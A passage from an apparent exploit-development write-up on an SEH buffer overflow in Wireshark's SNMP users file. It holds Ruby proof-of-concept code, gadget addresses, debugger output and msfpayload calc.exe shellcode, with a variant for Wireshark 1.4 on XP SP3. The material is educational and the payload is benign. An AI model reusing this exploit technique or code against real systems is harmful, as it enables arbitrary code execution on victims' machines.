0x0068a530 pop esi; pop ebp; ret
0x0068b510 pop esi; pop ebp; ret
0x0068b890 pop esi; pop ebp; ret
0x006ecb02 pop esi; pop ebp; ret
0x006ecc09 pop ebx; pop edi; ret
0x006ecc0f pop ebx; pop edi; ret
0x00a68404 pop eax; pop eax; ret
0x00a822de pop esi; pop edx; retn 0x83ff
0x00a824dd pop edi; pop eax; retn 0x83ff
0x00aa8a8d pop edi; pop ebp; retn 0x83ff
0x00bdb972 pop esi; pop ebp; ret
0x00bdbae2 pop esi; pop ebp; ret
0x00d16426 pop ebx; pop ebp; ret
0x00d8a8ee pop eax; pop ebx; retn 0x8b10
0x00dc8e94 pop esi; pop ebp; ret
0x00f89c11 pop esi; pop ebp; ret
0x01077e89 pop ecx; pop ecx; ret
0x01077ed5 pop ecx; pop ebp; retn 0x000c
0x01078055 pop esi; pop edi; retn 0x0010
0x01078273 pop esi; pop ebx; retn 0x0010
0x0107856b pop edi; pop esi; ret
0x01078591 pop edi; pop esi; ret
0x01078631 pop ebx; pop ebp; ret
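
The second listing is just the first one rebased: subtract the base msfpescan assumed and add the base windbg reported. A minimal sketch of that step (the helper name is mine):

```ruby
ASSUMED_BASE = 0x10000000  # base msfpescan assumed in the first listing
ACTUAL_BASE  = 0x00680000  # libwireshark start address reported by lml

# Move an address from one image base to another.
def rebase(addr, from_base, to_base)
  addr - from_base + to_base
end

[0x10003998, 0x109f7e89].each do |addr|
  puts "0x%08x -> 0x%08x" % [addr, rebase(addr, ASSUMED_BASE, ACTUAL_BASE)]
end
```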
Any of the above addresses should work, so I used the first one (00683998). Changing our ruby code to use this address gives us
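# hex dword string -> little-endian hex string, e.g. "00683998" -> "98396800"
# (unpack("H*") gives the same result on old and current ruby versions)
def flip_dword(str)
 [str.hex].pack("V").unpack("H*").first
end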

engine_id = "90" * 1136
engine_id += flip_dword("00683998")

File.open("#{ENV['APPDATA']}\\Wireshark\\snmp_users","w") do |file|
 file.write(engine_id + ',"username","SHA1","password","DES","password"' + "\n")
end
Running wireshark again shows us landing back into our data after our pop-pop-ret handler was called:
0012ffb0 90              nop
0012ffb1 90              nop
0012ffb2 90              nop
0012ffb3 90              nop
0012ffb4 98              cwde
0012ffb5 396800          cmp     dword ptr [eax],ebp
0012ffb8 ffad5a910100    jmp     fword ptr [ebp+1915Ah]
0012ffbe 0000            add     byte ptr [eax],al
0012ffc0 f0ff12          lock call dword ptr [edx]
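
The bytes at 0012ffb4 in that listing (98 39 68 00) are simply the handler address stored little-endian, which is what the flip_dword helper is for. A standalone sketch of the same conversion (flip_dword_hex is my name for it, chosen to avoid clashing with the helper in the poc):

```ruby
# Hex dword string -> little-endian hex string.
def flip_dword_hex(str)
  [str.hex].pack("V").unpack("H*").first
end

puts flip_dword_hex("00683998")  # 98396800
puts flip_dword_hex("beefface")  # cefaefbe
```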
Notice that we have four bytes of instructions we can use before we have to execute the address of our SEH handler (0012ffb4 and 0012ffb5). Since we don't really want to have to execute those instructions, we can put a short jmp at 0012ffb2 (two bytes) to jump over to 0012ffb8 into instructions we can control again. I tried putting the shellcode after 0012ffb8, but it gets truncated/messed with somewhere along the way, so I ended up putting it back before 0012ffb0 and using the first short jmp to jmp over the SEH handler address, and then a second near jmp (required 5 bytes) to jmp back to the start of my shellcode. I used msfpayload to generate the shellcode for calc.exe:
-n4g-[ snmpuser ]-$ msfpayload windows/exec CMD=calc.exe y
# windows/exec - 200 bytes
# http://www.metasploit.com
# EXITFUNC=process, CMD=calc.exe
buf = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68" +
"\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95" +
"\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e" +
"\x65\x78\x65\x00"
The ruby poc code now looks like this:
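# hex dword string -> little-endian hex string, e.g. "00683998" -> "98396800"
def flip_dword(str)
 [str.hex].pack("V").unpack("H*").first
end
# raw bytes -> hex string (works on old and current ruby versions)
def to_hex(str)
 str.unpack("H*").first
end
# jmp short
def jmp_eb(len)
 "\xeb" + len.chr
end
# jmp near (opcode byte + little-endian rel32, packed together as binary)
def jmp_e9(len)
 [0xe9, len].pack("CV")
end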

# windows/exec - 200 bytes
# http://www.metasploit.com
# EXITFUNC=process, CMD=calc.exe
shellcode = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68" +
"\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95" +
"\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e" +
"\x65\x78\x65\x00"
shellcode += "\x90\x90" + jmp_eb(4) # jmp past the SEH address

nop_length = 1136 - shellcode.length
engine_id = "90" * nop_length
engine_id += to_hex(shellcode)
engine_id += flip_dword("00683998") # pop-pop-ret in libwireshark.dll
engine_id += to_hex(jmp_e9(-(engine_id.length / 2 - nop_length + 5))) # the jmp_e9 is 5 bytes long

File.open("#{ENV['APPDATA']}\\Wireshark\\snmp_users","w") do |file|
 file.write(engine_id + ',"username","SHA1","password","DES","password"' + "\n")
end
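
The two jumps are easier to follow as offsets from the start of the engineID bytes. A sketch of the arithmetic behind the poc above, assuming the 200-byte payload and the 1136-byte pad from earlier (the constant names are mine):

```ruby
PAD_BYTES    = 1136         # bytes written before the handler slot
PAYLOAD_LEN  = 200 + 2 + 2  # shellcode + two nops + jmp short
NOP_LEN      = PAD_BYTES - PAYLOAD_LEN
HANDLER_LEN  = 4            # the pop-pop-ret address
JMP_NEAR_LEN = 5            # e9 + rel32

# jmp short sits in the last two bytes before the handler slot.
SHORT_JMP_AT = PAD_BYTES - 2
SHORT_TARGET = SHORT_JMP_AT + 2 + 4  # end of the jmp + rel8 of 4

# jmp near sits right after the handler address and jumps backwards.
NEAR_JMP_AT  = PAD_BYTES + HANDLER_LEN
NEAR_REL32   = -(NEAR_JMP_AT - NOP_LEN + JMP_NEAR_LEN)
NEAR_TARGET  = NEAR_JMP_AT + JMP_NEAR_LEN + NEAR_REL32

puts "nop sled length:    #{NOP_LEN}"       # 932
puts "short jmp lands at: #{SHORT_TARGET}"  # 1140, first byte of the near jmp
puts "near jmp rel32:     #{NEAR_REL32}"    # -213
puts "near jmp lands at:  #{NEAR_TARGET}"   # 932, first byte of the shellcode
```

So the short jmp skips exactly the four handler bytes, and the near jmp lands on the first byte after the nop sled.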
This poc now pops calc, but only on the dev build of wireshark that I used. To get this to work on wireshark 1.4, I had to change the pop-pop-ret address, as well as the amount to overflow the buffer with in order to overwrite the SEH handler. The code below works fine for me in XP SP3 with the default install of Wireshark 1.4:
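# hex dword string -> little-endian hex string, e.g. "00653998" -> "98396500"
def flip_dword(str)
 [str.hex].pack("V").unpack("H*").first
end
# raw bytes -> hex string (works on old and current ruby versions)
def to_hex(str)
 str.unpack("H*").first
end
# jmp short
def jmp_eb(len)
 "\xeb" + len.chr
end
# jmp near (opcode byte + little-endian rel32, packed together as binary)
def jmp_e9(len)
 [0xe9, len].pack("CV")
end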

# windows/exec - 200 bytes
# http://www.metasploit.com
# EXITFUNC=process, CMD=calc.exe
shellcode = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68" +
"\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95" +
"\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e" +
"\x65\x78\x65\x00"
shellcode += "\x90\x90" + jmp_eb(4) # jmp past the SEH address
# nop_length = 1136 - shellcode.length # wireshark 1.5
nop_length = 1128 - shellcode.length # wireshark 1.4
engine_id = "90" * nop_length
engine_id += to_hex(shellcode)
engine_id += flip_dword("00653998") # pop-pop-ret in libwireshark.dll (1.4)
# engine_id += flip_dword("00683998") # pop-pop-ret in libwireshark.dll (1.5)
engine_id += to_hex(jmp_e9(-(engine_id.length / 2 - nop_length + 5))) # the jmp_e9 is 5 bytes long

File.open("#{ENV['APPDATA']}\\Wireshark\\snmp_users","w") do |file|
 file.write(engine_id + ',"username","SHA1","password","DES","password"' + "\n")
end
This was fun. Too bad you can only pwn yourself, though.

Lessons learned:
  1. Don't copy and paste code
  2. If you must copy and paste code, at least read the comments